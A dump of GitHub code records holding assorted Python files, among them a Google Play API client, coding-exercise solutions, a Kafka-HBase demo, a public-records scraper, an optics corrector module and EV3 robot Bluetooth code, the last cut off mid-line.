up eventually.\n await local_task\n token = local_task.result()\n if created_task:\n task = None\n\n if call.name == \"get_purchases_products\":\n url = f\"{BASE_URL}/{call.args[0]}/purchases/products/{call.args[1]}/tokens/{call.args[2]}\"\n query_params: Dict[str, str] = {}\n elif call.name == 
\"get_voided_purchases\":\n url = f\"{BASE_URL}/{call.args[0]}/purchases/voidedpurchases\"\n query_params = {}\n if call.args[1] is not None:\n query_params[\"startTime\"] = str(call.args[1])\n if call.args[2] is not None:\n query_params[\"endTime\"] = str(call.args[2])\n if call.args[3] is not None:\n query_params[\"token\"] = str(call.args[3])\n if call.args[4] is not None:\n query_params[\"type\"] = str(call.args[4])\n try:\n resp = await invoke_api(\n session, token.access_token, url, query_params=query_params\n )\n except HttpError as exc:\n if exc.status_code == 401:\n # Refresh the access token.\n if task is not None:\n local_task = task\n await local_task\n local_token = local_task.result()\n else:\n task = create_task(\n request_access_token(session, creds.token_uri, creds)\n )\n await task\n local_token = token = task.result()\n task = None\n resp = await invoke_api(session, local_token.access_token, url)\n else:\n raise\n\n try:\n return converter.structure(loads(resp), resp_type)\n except Exception as exc:\n raise ParseError(resp) from exc\n\n return aiohttp_client_adapter(\"\", sender=sender)\n\n\nasync def create_google_client():\n return await create_client(\n GooglePlayDeveloperApi,\n google_client_network_adapter(\n ServiceAccountCredentials.from_filename(\"service.json\")\n ),\n )\n","repo_name":"Tinche/pyrseia","sub_path":"contrib/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":7899,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"72253253531","text":"from mdutils.mdutils import MdUtils\nfrom mephisto.client.cli_commands import get_wut_arguments\nfrom mephisto.operations.registry import get_valid_architect_types\nfrom mephisto.scripts.local_db.gh_actions.auto_generate_blueprint import (\n create_blueprint_info,\n)\n\n\ndef main():\n architect_file = MdUtils(\n file_name=\"../../../../docs/web/docs/reference/architects.md\",\n )\n architect_file.new_header(level=1, title=\"Architects\")\n architect_file.new_paragraph(\n \"Architects contain the logic surrounding deploying a server that workers will be able to access.\"\n )\n valid_architect_types = get_valid_architect_types()\n for architect_type in valid_architect_types:\n architect_file.new_header(level=2, title=architect_type.replace(\"_\", \" \"))\n args = get_wut_arguments(\n (\"architect={architect_name}\".format(architect_name=architect_type),)\n )\n arg_dict = args[0]\n create_blueprint_info(architect_file, arg_dict)\n\n architect_file.create_md_file()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"facebookresearch/Mephisto","sub_path":"mephisto/scripts/local_db/gh_actions/auto_generate_architect.py","file_name":"auto_generate_architect.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":282,"dataset":"github-code","pt":"32"} +{"seq_id":"22703097565","text":"plants_list = {\"C\": \"Clover\", \"G\": \"Grass\", \"R\": \"Radishes\", \"V\": \"Violets\"}\n\nstudents_list = [\n \"Alice\",\n \"Bob\",\n \"Charlie\",\n \"David\",\n \"Eve\",\n \"Fred\",\n \"Ginny\",\n \"Harriet\",\n \"Ileana\",\n \"Joseph\",\n \"Kincaid\",\n \"Larry\",\n]\n\n\nclass Garden:\n def __init__(self, diagram, students=students_list):\n self.students = self.__parse_students(students)\n self.students_plants = self.__parse_diagram(diagram)\n\n def plants(self, student):\n return self.students_plants[student]\n\n def __parse_diagram(self, diagram):\n diagram_split = diagram.split()\n diagram_zip = 
list(zip(diagram_split[0], diagram_split[1]))\n list_of_groups = list(zip(*(iter(diagram_zip),) * 2))\n students_plants = {}\n for index, group in enumerate(list_of_groups):\n unify_tuple = (\n group[0][0] + group[1][0] + group[0][1] + group[1][1]\n ) # refactor this part tomorrow\n students_plants[self.students[index]] = [\n plants_list[p] for p in unify_tuple\n ]\n return students_plants\n\n def __parse_students(self, students):\n return sorted(students)\n","repo_name":"anaschwendler/everyday-exercise","sub_path":"python/kindergarten-garden/kindergarten_garden.py","file_name":"kindergarten_garden.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"27047622508","text":"import pygame\n\n\n#########################################\n# Game class\n# Functions:\n# __init__(bananas):\n# @params: bananas\n# bananas refers to the amount of bananas the user had\n# @brief: stores the amount of bananas in self.bananas\n# @return: none\n#\n# addBanana(amount):\n# @params amount\n# amount is the number of bananas to add to the existing amount\n# @brief: updates the current number of bananas on the game itself depending\n# on the number of bananas added\n# @returns: none\n##########################################\n\nclass Game:\n def __init__(self,bananas,multiClicks):\n self.bananas = bananas\n self.clickMultiplier = multiClicks\n self.bananaPerClick = 1\n self.upgradeCost = ((10 + self.clickMultiplier) * 10)\n\n def addBanana(self):\n self.bananaPerClick = 1 + self.clickMultiplier\n self.bananas += self.bananaPerClick\n \n def multiClick(self):\n if(self.bananas >= self.upgradeCost):\n self.bananas -= self.upgradeCost\n self.clickMultiplier += 1\n self.upgradeCost += 10\n \n \n \n \n ","repo_name":"Alexquiton/bananaclicker","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"18744098134","text":"from typing import List\n\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n intersection = []\n nums1_dict = {}\n nums2_dict = {}\n\n for num in nums1:\n if num in nums1_dict:\n nums1_dict[num] += 1\n else:\n nums1_dict[num] = 1\n\n for num in nums2:\n if num in nums2_dict:\n nums2_dict[num] += 1\n else:\n nums2_dict[num] = 1\n\n for n in nums1_dict:\n if n in nums2_dict:\n if nums1_dict[n] < nums2_dict[n]:\n intersection.extend([n] * nums1_dict[n])\n else:\n intersection.extend([n] * nums2_dict[n])\n\n return intersection\n","repo_name":"ivankliuk/leetcode","sub_path":"python/intersection-of-two-arrays-ii.py","file_name":"intersection-of-two-arrays-ii.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32198902568","text":"\nheight = [int(input()) for _ in range(9)]\ntotal = sum(height)\nfor i in range(9):\n for j in range(i+1, 9):\n if total - (height[i] + height[j]) == 100:\n num1, num2 = height[i], height[j] # Store the values first: once an element is removed the indices shift and the values at those positions change, so save them before deleting.\n\n height.remove(num1) # Deleting with pop() relies on indices, which change after a removal, so delete by value with remove(); the values were stored separately beforehand so the second element can still be removed even after the first deletion.\n height.remove(num2)\n break\n if len(height) < 9:\n break\nheight.sort()\nfor i in height:\n 
print(i)\n\n","repo_name":"rlatmd0829/algorithm","sub_path":"알고리즘풀이/21.07.02/일곱난쟁이.py","file_name":"일곱난쟁이.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30785240409","text":"#!/usr/bin/env python\nimport threading, logging, time\nimport multiprocessing\nimport sys\n\nfrom kafka import KafkaConsumer, KafkaProducer\nimport happybase\n\n\nclass Producer(threading.Thread):\n def __init__(self, kafkaHost):\n threading.Thread.__init__(self)\n self.stop_event = threading.Event()\n \n def stop(self):\n self.stop_event.set()\n\n def run(self):\n producer = KafkaProducer(bootstrap_servers= kafkaHost + ':9092')\n print(\"producer: \" + str(producer))\n\n while not self.stop_event.is_set():\n producer.send('my-topic1', b\"<<<<<<<<< my-topic test\")\n producer.send('my-topic1', b\">>>>>>>>>> test\")\n time.sleep(1)\n\n producer.close()\n\n\n# class Consumer(multiprocessing.Process):\n# def __init__(self, kafkaHost, hbaseHost):\n# multiprocessing.Process.__init__(self)\n# self.stop_event = multiprocessing.Event()\n \n# def stop(self):\n# self.stop_event.set()\n \n# def run(self):\n# f=open(\"log\",\"w\")\n# consumer = KafkaConsumer('my-topic1',\n# bootstrap_servers= kafkaHost+':9092')\n# print(\"consumer: \" + consumer)\n# f.write(\"consumer: \" + consumer + \"\\n\")\n\n# connection = happybase.Connection(host=hbaseHost, port=9090)\n# connection.open()\n# print(\"connection: \" + connection)\n# f.write(\"connection: \" + connection + \"\\n\")\n\n# table = connection.table('my-topic11')\n# print(\"table: \" + table)\n# f.write(\"table: \" + table + \"\\n\")\n \n# count = 0\n# while not self.stop_event.is_set():\n# for message in consumer:\n# count += 1\n# print(\"message: \" + message.value)\n# f.write(\"message: \" + message.value + \"\\n\")\n \n# table.put('row-key' + str(count), {'cf:col1': message.value})\n# if self.stop_event.is_set():\n# break\n\n# for key, data in table.scan():\n# print(key, data)\n \n# f.close()\n# consumer.close()\n\nclass Consumer(threading.Thread):\n def __init__(self, kafkaHost, hbaseHost):\n threading.Thread.__init__(self)\n self.stop_event = threading.Event()\n \n def stop(self):\n self.stop_event.set()\n\n def run(self):\n consumer = KafkaConsumer('my-topic1',\n bootstrap_servers=[ kafkaHost + ':9092'])\n print(\"consumer: \"+ str(consumer))\n \n connection = happybase.Connection(host=hbaseHost, port=9090)\n connection.open()\n\n table = connection.table('my-topic11')\n \n count = 0\n while not self.stop_event.is_set():\n for message in consumer:\n count += 1\n print (\"%s:%d:%d: key=%s value=%s\" % (message.topic, message.partition,\n message.offset, message.key,\n message.value))\n table.put('row-key' + str(count), {'cf:col1': message.value})\n if self.stop_event.is_set():\n break\n\n for key, data in table.scan():\n print(key, data)\n \n consumer.close()\n \n \ndef main(kafkaHost, hbaseHost):\n\n tasks = [\n Producer(kafkaHost),\n Consumer(kafkaHost, hbaseHost)\n ]\n\n for t in tasks:\n t.daemon = True\n t.start()\n\n time.sleep(5)\n \n for task in tasks:\n task.stop()\n\n for task in tasks:\n task.join()\n \n \nif __name__ == \"__main__\":\n logging.basicConfig(\n format='%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s',\n level=logging.INFO\n )\n kafkaHost = sys.argv[1]\n hbaseHost = sys.argv[2]\n main(kafkaHost, 
hbaseHost)\n","repo_name":"BigdataFlatformDynamicConfiguration/kafka-hbase","sub_path":"kafka-hbase.py","file_name":"kafka-hbase.py","file_ext":"py","file_size_in_byte":3918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72036368090","text":"import time\nimport random\nimport csv\nimport os\nfrom datetime import datetime\nfrom urllib.parse import urlparse, parse_qs\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\nBASE_URL = 'https://redistricting.colorado.gov'\nTHIS_DIR = os.path.dirname(os.path.realpath(__file__))\nURL_PATTERN = '{}/{}_applicants/'\n\nPAGES_TO_SCRAPE = ['congressional', 'legislative']\n\nTIMES_APPLIED_LOOKUP_FILE = 'times_applied.csv'\n\n\ndef gather_links(soup):\n ''' given a bs4 object, grab the table data '''\n data = []\n table = soup.find('table')\n rows = table.find_all('tr')[1:]\n for row in rows:\n cells = row.find_all('td')\n link = cells[0].a['href']\n added = cells[-1].text\n data.append({\n 'link': f'{BASE_URL}{link}',\n 'added': added\n })\n return data\n\n\ndef get_init_data(url):\n ''' get initial data from a search page:\n the first page of results and the\n number of pages to iterate through\n '''\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n p1data = gather_links(soup)\n max_pages_link = soup.find('a', string='Last »')['href']\n parsed_url = urlparse(max_pages_link)\n max_pages = int(parse_qs(parsed_url.query)['page'][0])\n return {\n 'p1data': p1data,\n 'max_pages': max_pages\n }\n\n\ndef download_pages():\n ''' cycle through both apps and download the pages\n linked to from all the search pages -- also\n creates an intermediary file to keep track of\n the times when people submitted their applications\n '''\n\n # open the file and write the headers\n talf_out = open(TIMES_APPLIED_LOOKUP_FILE, 'w')\n headers = ['commission_type', 'id', 'time_applied']\n writer = csv.DictWriter(talf_out, fieldnames=headers)\n writer.writeheader()\n\n # loop over the commission type directories\n for page in PAGES_TO_SCRAPE:\n\n # build the URL\n url = URL_PATTERN.format(\n BASE_URL,\n page\n )\n\n # fetch initial data\n init_data = get_init_data(url)\n links = init_data['p1data']\n max_pages = init_data['max_pages']\n\n # hol up\n time.sleep(random.uniform(1, 2))\n\n # loop over the range of pages\n for page_no in range(2, max_pages+1):\n\n # grab the next page of search results with params\n r = requests.get(url, params={'page': page_no})\n\n # soup the HTML and call the extraction function\n soup = BeautifulSoup(r.text, 'html.parser')\n new_links = gather_links(soup)\n\n # add to the running list of detail links\n links = links + new_links\n\n # just a sec k\n time.sleep(random.uniform(1, 2))\n\n # now, loop over the detail page links\n for link in links:\n\n # get the applicant's ID number\n applicant_id = link['link'].split('/')[-1]\n\n # and reformat the application date to ISO 8601\n datetime_applied = datetime.strptime(\n link['added'].replace(' UTC', ''),\n '%Y-%m-%d %H:%M:%S %z'\n ).isoformat() + 'Z'\n\n # write timestamp data to file\n writer.writerow({\n 'commission_type': page,\n 'id': applicant_id,\n 'time_applied': datetime_applied\n })\n\n # make a file path to the HTML file\n filepath = os.path.join(\n THIS_DIR,\n page,\n applicant_id\n ) + '.html'\n\n # check if we've already downloaded this one\n if not os.path.isfile(filepath):\n\n # if not, grab the detail page\n detail_page = requests.get(link['link'])\n\n # write it to file\n with open(f'{filepath}', 'w') 
as outfile:\n outfile.write(detail_page.text)\n\n # holler at us\n print(f'Wrote {filepath}')\n\n # won't take but a moment\n time.sleep(random.uniform(1, 2))\n\n # close the file yo\n talf_out.close()\n\n\nif __name__ == '__main__':\n download_pages()\n","repo_name":"cjwinchester/co-redistricting-commission-applicants","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":4165,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72887631450","text":"#!/usr/bin/env python\nfrom common import RosSubscriber\nfrom sensor_msgs.msg import Joy\n\nclass JoystickSubscriber(RosSubscriber):\n def _setup(self):\n self.msg = Joy\n\n def _make_dic(self, msg):\n dict = {}\n for i in range(len(msg.axes)):\n n = \"axes\"+str(i)\n v = msg.axes[i]\n dict[n] = v\n for i in range(len(msg.buttons)):\n n = \"buttons\"+str(i)\n v = msg.buttons[i]\n dict[n] = v\n return dict\n\ndef setup(robot):\n robot.add_subscriber(JoystickSubscriber(u\"joy\"))\n","repo_name":"EiichiroIto/ros_rsp_server","sub_path":"scripts/robot/joystick.py","file_name":"joystick.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7851104635","text":"import numpy as np\n#from sympy.functions.elementary.piecewise import Piecewise\n#from kernuller import mas2rad, rad2mas\n#from . import utilities\nfrom . import n_air\n#from astropy import constants\n#from astropy import units\nimport scipy.interpolate as interp\nfrom pathlib import Path\n\n\n\nparent = Path(__file__).parent.absolute()\nznse_file = parent/\"data/znse_index.csv\"\n\n# Brute force test parameter to \nthetas = np.linspace(-np.pi, np.pi, 10000)\ncomphasor = np.ones(4)[None,:]*np.exp(1j*thetas[:,None])\n\n# Utility functions for optimization\n##################################################\n\nfrom lmfit import Parameters, minimize\ndef extract_corrector_params(corrector, params):\n \"\"\"\n Utility function to reconstruct the *b* and *c*\n vectors from the lmfit Parameters object.\n \n **Parameters:**\n \n * corrector : The corrector object\n * params : at lmfit Parameters object\n containing b_i and c_i terms\n \"\"\"\n \n ntel = corrector.b.shape[0]\n bvec = np.zeros_like(corrector.b)\n cvec = np.zeros_like(corrector.c)\n for i in range(ntel):\n bvec[i] = params[\"b%d\"%(i)]\n cvec[i] = params[\"c%d\"%(i)]\n return bvec,cvec\n\n\ndef get_depth(combiner, Is,):\n \"\"\"\n Computes a \"null depth\" analogue (dark/bright)\n to be minimized by the tuning method.\n The masks in the combiner definition\n are used to determine the role of the different outputs.\n \n **Parameters:**\n \n * combiner : A combiner object.\n * Is : An array of intensities\n \n .. 
admonition: Note:\n \n This definition might need some adjustments for\n use in kernel-nullers?\n \"\"\"\n bright = Is[:,combiner.bright].sum(axis=1)\n dark = Is[:,combiner.dark].sum(axis=1)\n res = (dark/bright)\n return res\n\ndef get_Is(params, combiner, corrector, lambs):\n \"\"\"\n Returns intensities at the combiners' outputs\n taking into account the corrections provided in\n params.\n \n **dcomp is computed automatically be default.**\n \n **Parameters:**\n \n * params : either\n \n - A Parameters object from the optimization\n - A tuple of vectors bvec, cvec\n \n * combiner : A combiner object.\n * corrector : The corrector object\n * lambs : The wavelengths considered.\n \"\"\"\n \n if isinstance(params, Parameters):\n bvec, cvec = extract_corrector_params(corrector, params)\n else:\n bvec, cvec = params\n phasor = corrector.get_phasor_from_params(lambs, \n a=None,\n b=bvec,\n c=cvec)\n #res = combiner.Mcn.dot(phasor)\n res = np.einsum(\"ikj,ij->ik\", combiner.Mcn, phasor)\n Is = np.abs(res)**2\n return Is\n\n\ndef get_contrast_res(params, combiner, corrector, lambs):\n \"\"\"\n Macro that gets the a residual from parameters \n for minimizing method.\n \"\"\"\n Is = get_Is(params, combiner, corrector, lambs)\n res = get_depth(combiner, Is)\n return res\n\n\ndef get_es(params, combiner, corrector, lambs):\n \"\"\"\n Returns the enantiomorph excursion taking into account the corrections provided in\n params.\n \n **Currently works only for double-bracewell 3-4 architecures**\n \n **dcomp is computed automatically by default.**\n \n **Parameters:**\n \n - params : either\n * A Parameters object from the optimization\n * A tuple of vectors bvec, cvec\n - combiner : A combiner object.\n - corrector : The corrector object\n - lambs : The wavelengths considered.\n \"\"\"\n \n if isinstance(params, Parameters):\n bvec, cvec = extract_corrector_params(corrector, params)\n else:\n bvec, cvec = params\n phasor = corrector.get_phasor_from_params(lambs, \n a=None,\n b=bvec,\n c=cvec)\n thetas = np.linspace(-np.pi, np.pi, 10000)\n comphasor = np.ones(4)[None,:]*np.exp(1j*thetas[:,None])\n amatcomp = np.einsum(\"ijk, ik -> ijk\", combiner.Mcn, phasor)\n allcor = np.einsum(\"ik, mk -> mik\", amatcomp[:,3,:], comphasor) - np.conjugate(amatcomp[:, 4,:])[None,:,:]\n excursion = np.min(np.linalg.norm(allcor, axis=2), axis=0)\n \n return excursion\ndef get_shape_res(params, combiner, corrector, lambs):\n \"\"\"\n Macro that gets the a residual from parameters \n for minimizing method.\n \"\"\"\n res = get_es(params, combiner, corrector, lambs)\n return res\n\n\nclass corrector(object):\n def __init__(self, config, lambs, file=None):\n \"\"\"\n A module that provides beam adjustments\n for the input. It contains amplitude *a*, geometric\n piston *b* and ZnSe piston substitution *c*. 
Note that\n the ZnSe length replaces some air length.\n \n **Parameters:**\n \n * config: A parsed config file\n * lambs : The wavelength channels to consider [m]\n (At the __init__ stage, it is only used for\n the computation of a mean refractive index for\n the dispersive material)\n * file : A file containing the plate index\n \n **Internal parameters:**\n \n * a : Vector of the amplitude term\n * b : Vector of the geometric piston term [m]\n * c : Vector of the dispersive piston term [m]\n \"\"\"\n self.config = config\n if file is None:\n nplate_file = np.loadtxt(znse_file,delimiter=\";\")\n else: \n nplate_file = file\n self.nplate = interp.interp1d(nplate_file[:,0]*1e-6, nplate_file[:,1],\n kind=\"linear\", bounds_error=False )\n diams = self.config.getarray(\"configuration\", \"diam\")\n n_tel = diams.shape[0]\n # An amplitude factor\n self.a = np.ones(n_tel)\n self.b = np.zeros(n_tel)\n self.c = np.zeros(n_tel)\n self.nmean= np.mean(self.nplate(lambs))\n self.dcomp = -(self.nmean-1)*self.c\n \n self.prediction_model = n_air.wet_atmo(config)\n \n \n def get_phasor(self, lambs):\n \"\"\"\n Returns the complex phasor corresponding\n to the current a, b, c, and dcomp phasors.\n \n **Parameters:**\n \n * lambs : The wavelength channels to consider [m]\n \n **Returns:** alpha\n \"\"\"\n ns = self.nplate(lambs)\n alpha = self.a[None,:]*np.exp(-1j*2*np.pi/lambs[:,None]*(self.b[None,:]+self.dcomp[None,:] +self.c[None,:]*(ns[:,None]-1)))\n return alpha\n def get_phasor_s(self, lambs):\n \"\"\"\n Deprecated\n \"\"\"\n ns = self.nplate(lambs)\n alpha = self.a*np.exp(-1j*2*np.pi/lambs*(self.b + self.dcomp +self.c*(ns-1)))\n return alpha\n def get_raw_phase_correction(self, lambs, b=0,c=0, dcomp=0, model=None):\n \"\"\"\n Returns the raw (non-wrapped) phase produced by an optical path\n of b[m] in air and c[m] in plate material.\n \n **Parameters**\n \n * lambs : The wavelength channels to consider [m]\n * a : Vector of the amplitude term\n * b : Vector of the geometric piston term [m]\n * c : Vector of the dispersive piston term [m]\n * dcomp : A length of air to compensate for the plate\n \n \n \"\"\"\n if model is None:\n model = self.prediction_model\n nair = model.get_Nair(lambs, add=1)\n nplate = self.nplate(lambs)\n return 2*np.pi/lambs*(nair*b + nplate*c)\n def get_dcomp(self, c):\n \"\"\"\n Returns the theoretical value of dcomp for a given value of compensator\n plate, to correct for the pure piston term introduced.\n \"\"\"\n dcomp = -(self.nmean-1)*c\n return dcomp\n \n def get_phasor_from_params(self, lambs, a=None,\n b=None, c=None,\n dcomp=None):\n \"\"\"\n Similar to get_phasor() but allows to provide the\n parameters as arguments (slower).\n \n Returns the complex phasor corresponding\n to the current a, b, c, and dcomp phasors.\n \n **Parameters:**\n \n * lambs : The wavelength channels to consider [m]\n * a : Vector of the amplitude term\n * b : Vector of the geometric piston term [m]\n * c : Vector of the dispersive piston term [m]\n \"\"\"\n ns = self.nplate(lambs)\n if a is None:\n a = self.a\n if b is None:\n b = self.b\n if c is None:\n c = self.c\n if dcomp is None:\n dcomp = self.get_dcomp(c)\n alpha = a[None,:]*np.exp(-1j*2*np.pi/lambs[:,None]*(b[None,:] + dcomp[None,:] +c[None,:]*(ns[:,None]-1)))\n return alpha\n \n def theoretical_phase(self,lambs, proj_opds, model=None, add=1):\n \"\"\"\n Computes the theoretical chromatic phase effect of the\n array geometry projected on axis based on the wet atmosphere\n model.\n \n **Parameters:**\n \n * lambs : The wavelength channels 
to consider [m]\n * proj_opds : The projected piston obtained by projection\n (Get from simulator.obs.get_projected_geometric_pistons)\n * model : A model for humid air (see n_air.wet_atmo object).\n If None, defaults to self.model, created upon init.\n * add : returns n-1+add (add=0 gives the relative\n optical path compared to vacuum)\n \n **Returns:** phase\n \"\"\"\n nair = model.get_Nair(lambs, add=add)\n phase = 2*np.pi/lambs*nair*proj_opds\n return phase.T\n \n def solve_air(self, lambs, model):\n \"\"\"\n Computes a least squares compensation model (see\n **Koresko et al. 2003 DOI: 10.1117/12.458032**)\n \n **Parameters:**\n \n * lambs : The wavelength channels to consider [m]\n * model : The wet atmosphere model (see n_air.wet_atmo object)\n \n **Returns:** :math:`\\Big( \\mathbf{A}^T\\mathbf{A}\\mathbf{A}^T \\Big)^{-1}`\n \"\"\"\n nair = model.get_Nair(lambs)\n ns = np.array([nair, self.nplate(lambs)]).T\n A = 2*np.pi/lambs[:,None] * ns\n \n self.S = np.linalg.inv(A.T.dot(A)).dot(A.T)\n return self.S\n \n def tune_static(self, lambs, combiner, apply=True,\n freeze_params=[\"b0\", \"c0\", \"b2\", \"c2\"]):\n \"\"\"\n Optimize the compensator to correct chromatism in the \n model of the combiner. Returns a lmfit solution object.\n If \"apply\" is set to True, a, b, c, and dcomp are also\n set to the best fit value.\n \n **Parameters:**\n \n * lambs : The wavelength channels to consider [m]\n * combiner : A combiner object (chromatic) \n * apply : Boolean deciding whether to set the local\n parameters to best fit value (default: True)\n * freeze_params : The name of parameters to be freezed.\n Should be used to account for the larger than\n necessary number of degrees of freedom.\n \n .. admonition:: Note:\n \n For obtaining a more practical direct results, some\n more complicated balancing guidelines should be followed.\n \"\"\"\n params = Parameters()\n for i in range(self.b.shape[0]):\n params.add(\"b%d\"%(i),value=0., min=-1.0e-3, max=1.0e-3, vary=True)\n params.add(\"c%d\"%(i),value=0., min=-1.0e-3, max=1.0e-3, vary=True)\n params[\"b0\"].vary = False\n params[\"c0\"].vary = False\n params[\"c2\"].vary = False\n params[\"b2\"].vary = False\n sol = minimize(get_contrast_res, params,\n args=(combiner, self, lambs),\n method=\"leastsq\")\n \n self.sol = sol\n if apply:\n bvec, cvec = extract_corrector_params(self, sol.params)\n self.b = bvec\n self.c = cvec\n self.dcomp = -(self.nmean-1)*self.c\n return sol\n \n def tune_static_shape(self, lambs, combiner, apply=True,\n sync_params=[(\"b3\", \"b2\", 0.),\n (\"c3\", \"c2\", 0.)],\n freeze_params=[\"b0\", \"c0\", \"b1\", \"c1\"]):\n \"\"\"\n Optimize the compensator to correct chromatism in the \n model of the combiner to obtain enantomporph combinations\n at the outputs. Returns a lmfit solution object.\n If ``apply`` is set to True, a, b, c, and dcomp are also\n set to the best fit value.\n \n **Currently only works for double Bracewell 3-4 architectures.**\n \n **Parameters:**\n \n * lambs : The wavelength channels to consider [m]\n * combiner : A combiner object (chromatic) \n * apply : Boolean deciding whether to set the local\n parameters to best fit value (default: True)\n \n .. admonition:: Note:\n \n For obtaining a more practical direct results, some\n more complicated balancing guidelines should be followed.\n \n **Example:**\n \n .. 
code-block::\n \n sol = asim.corrector.tune_static_shape(asim.lambda_science_range,\n asim.combiner,\n sync_params=[(\"b3\", \"b2\", asim.corrector.b[3] - asim.corrector.b[2]),\n (\"c3\", \"c2\", asim.corrector.c[3] - asim.corrector.c[2])],\n apply=True)\n \n \"\"\"\n params = Parameters()\n print(\"inside_tuning\", self.b, self.c)\n for i in range(self.b.shape[0]):\n params.add(\"b%d\"%(i),value=self.b[i], min=-1.0e-3, max=1.0e-3, vary=True)\n params.add(\"c%d\"%(i),value=self.c[i], min=-1.0e-3, max=1.0e-3, vary=True)\n \n # Should do this in a loop for sync_params\n for tosync in sync_params:\n params[tosync[0]].set(expr=tosync[1]+f\"+ {tosync[2]}\")\n # If we have \n #b23 = self.b[3]-self.b[2]\n #c23 = self.c[3]-self.c[2]\n #params[\"b3\"].set(expr=f\"b2 + {b23}\")\n #params[\"c3\"].set(expr=f\"c2 + {c23}\")\n for aparam in freeze_params:\n params[aparam].set(vary=False)\n \n #display.display(params)\n sol = minimize(get_shape_res, params,\n args=(combiner, self, lambs),\n method=\"leastsq\")\n \n self.sol = sol\n if apply:\n bvec, cvec = extract_corrector_params(self, sol.params)\n self.b = bvec\n self.c = cvec\n self.dcomp = -(self.nmean-1)*self.c\n return sol\n \n \n \n \n \n ","repo_name":"rlaugier/SCIFYsim","sub_path":"scifysim/correctors.py","file_name":"correctors.py","file_ext":"py","file_size_in_byte":14920,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"38938503972","text":"\n\"\"\"\nfunkction for communication with bluetooth\n\n\"\"\"\n\ndef client(iMac, iData = \"test\", iPort=3):\n import socket\n\n # The MAC address of a Bluetooth adapter on the server.\n # The server might have multiple Bluetooth adapters.\n serverMACAddress = iMac\n port = iPort # port is an arbitrary choice. However, it must match the port used by the server.\n s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)\n try:\n s.connect((serverMACAddress, port))\n text = iData\n s.send(bytes(text, 'UTF-8'))\n s.close()\n except:\n s.close()\n\n\n\ndef server(iMac, iPort=3, iBacklog=1, iSize=1024):\n import socket\n\n # The MAC address of a Bluetooth adapter on the server.\n # The server might have multiple Bluetooth adapters.\n hostMACAddress = iMac\n port = iPort # port is an arbitrary choice. 
However, it must match the port used by the client.\n backlog = iBacklog\n size = iSize\n s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)\n s.bind((hostMACAddress, port))\n s.listen(backlog)\n try:\n client, address = s.accept()\n print(\"Socket is open\")\n while 1:\n data = client.recv(size)\n if data:\n print(\"Data ready\")\n client.send(data)\n except:\n print(\"Closing socket\")\n client.close()\n # data = 0\n s.close()\n return data\n\n\n\n\"\"\"\nCreated on Sun Jan 1 17:34:26 2017\n@author: jostp\n\"\"\"\n\n\ndef computeObjectPosition(iObjectWidthPx, iObjectXcoordPx, iObjectWidth=64, iFocalLength=215, iCamMaxAngle=38.65):\n '''\n Returns detected object's position in camera coordinate system, according to his width, and its center's x coordinate\n\n Parameters\n -----------\n iObjectWidthPx : int\n Object's width in pixels\n iObjectWidth : float\n Object's width in mm\n iObjectXcoordPx : int\n Object's x coordinate on camera in pixels\n iFocalLength : float\n Focal length of the camera in mm\n iCamMaxAngle : float\n Maximum camera vision angle in degrees\n\n Returns\n ----------\n np.array\n Computed postion (x,y) of object in camera coordinate system\n\n '''\n\n import numpy as np\n\n # compute object's distance from camera\n if iObjectWidthPx != 0:\n distance = iObjectWidth * iFocalLength / iObjectWidthPx\n else:\n distance = 0\n\n\n # compute object's angle to camera\n koef = -iCamMaxAngle / 128.0\n objectAngle = koef * (iObjectXcoordPx - 128)\n\n # compute object's coordinates\n oX = distance * np.cos(objectAngle * np.pi / 180)\n oY = distance * np.sin(objectAngle * np.pi / 180)\n\n\n return np.array((oX, oY))\n\n#########################################################################################################\n####################################### programm on EV3 ################################################\n#########################################################################################################\n\n\nimport time\nimport ev3dev.ev3 as ev3\n\npixy = ev3.Sensor('in1')\npixy.mode = 'ALL'\n\nm_left = ev3.LargeMotor('outB')\nm_right = ev3.LargeMotor('outC')\n\nbtn = ev3.Button()\n\n\nwhile not btn.any():\n\n dc_l = 20\n\n dc_r = 10\n\n # set motor speed values\n #m_left.run_direct(duty_cycle_sp=dc_l)\n #m_right.run_direct(duty_cycle_sp=dc_r)\n\n a = pixy.value(0)\n #b = pixy.value(1)\n c = pixy.value(2)\n #d = pixy.value(3)\n e = pixy.value(4)\n #f = pixy.value(5)\n\n pose = computeObjectPosition(e, c)\n\n aS = str(a)\n posX = str(pose[0])\n posY = str(pose[1])\n dcL = str(dc_l)\n dcR = str(dc_r)\n\n if len(aS) != 1:\n aS = \"0\"\n\n if len(dcL) == 1:\n dcL = \"00\" + dcL\n elif len(dcL) == 2:\n dcL = \"0\" + dcL\n else:\n dcL = dcL\n\n\n if len(dcR) == 